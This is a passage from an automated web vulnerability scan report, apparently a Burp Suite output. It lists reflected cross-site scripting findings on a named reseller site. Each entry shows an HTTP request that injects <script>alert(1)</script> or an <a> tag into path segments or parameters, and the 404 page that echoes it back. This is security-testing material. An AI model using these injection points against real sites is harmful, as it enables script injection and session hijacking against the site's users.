Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload de841<script>alert(1)</script>d5273994736 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/4half.gifde841<script>alert(1)</script>d5273994736 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/4half.gifde841<script>alert(1)</script>d5273994736 was not found on this server.</p>
...[SNIP]...

2.3601. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef8d2<script>alert(1)</script>9c01a5eec39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/4half.gif?ef8d2<script>alert(1)</script>9c01a5eec39=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/4half.gif?ef8d2<script>alert(1)</script>9c01a5eec39=1 was not found on this server.</p>
...[SNIP]...

2.3602. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90890<script>alert(1)</script>85feaab47b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail90890<script>alert(1)</script>85feaab47b3/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail90890<script>alert(1)</script>85feaab47b3/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3603. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc142<script>alert(1)</script>6599043bb38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7dc142<script>alert(1)</script>6599043bb38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7dc142<script>alert(1)</script>6599043bb38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3604. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3b3c<script>alert(1)</script>5d51d85f507 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesd3b3c<script>alert(1)</script>5d51d85f507/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesd3b3c<script>alert(1)</script>5d51d85f507/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3605. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7dbc6<script>alert(1)</script>86e4e2e3c0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos7dbc6<script>alert(1)</script>86e4e2e3c0a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos7dbc6<script>alert(1)</script>86e4e2e3c0a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3606. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 42b3b<script>alert(1)</script>16497a3c6a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images42b3b<script>alert(1)</script>16497a3c6a5/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images42b3b<script>alert(1)</script>16497a3c6a5/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3607. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2339<script>alert(1)</script>9016121717b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/ratingb2339<script>alert(1)</script>9016121717b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/ratingb2339<script>alert(1)</script>9016121717b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3608. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 72f62<script>alert(1)</script>41310648cbf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/search.php72f62<script>alert(1)</script>41310648cbf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php72f62<script>alert(1)</script>41310648cbf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3609. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96cf7<a>3e70dc8e666 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96cf7<a>3e70dc8e666&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96cf7<a>3e70dc8e666&opt=2 was not found on this server.</p>
...[SNIP]...

2.3610. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 68640<a>cba0dd9d426 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...68640<a>cba0dd9d426&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...68640<a>cba0dd9d426&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3611. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a210<script>alert(1)</script>960929c2627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9a210<script>alert(1)</script>960929c2627=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9a210<script>alert(1)</script>960929c2627=1 was not found on this server.</p>
...[SNIP]...

2.3612. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7eba9<a>0c92c5e7481 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27eba9<a>0c92c5e7481 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27eba9<a>0c92c5e7481 was not found on this server.</p>
...[SNIP]...

2.3613. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 258a0<script>alert(1)</script>1d9f9339b2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail258a0<script>alert(1)</script>1d9f9339b2a/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail258a0<script>alert(1)</script>1d9f9339b2a/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3614. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d706d<script>alert(1)</script>09db072977d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7d706d<script>alert(1)</script>09db072977d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7d706d<script>alert(1)</script>09db072977d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3615. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eeeba<script>alert(1)</script>e9f7859367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themeseeeba<script>alert(1)</script>e9f7859367/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themeseeeba<script>alert(1)</script>e9f7859367/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3616. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a43c0<script>alert(1)</script>a46733b6708 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosa43c0<script>alert(1)</script>a46733b6708/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosa43c0<script>alert(1)</script>a46733b6708/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3617. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 54dc6<script>alert(1)</script>a76dea6d432 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images54dc6<script>alert(1)</script>a76dea6d432/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
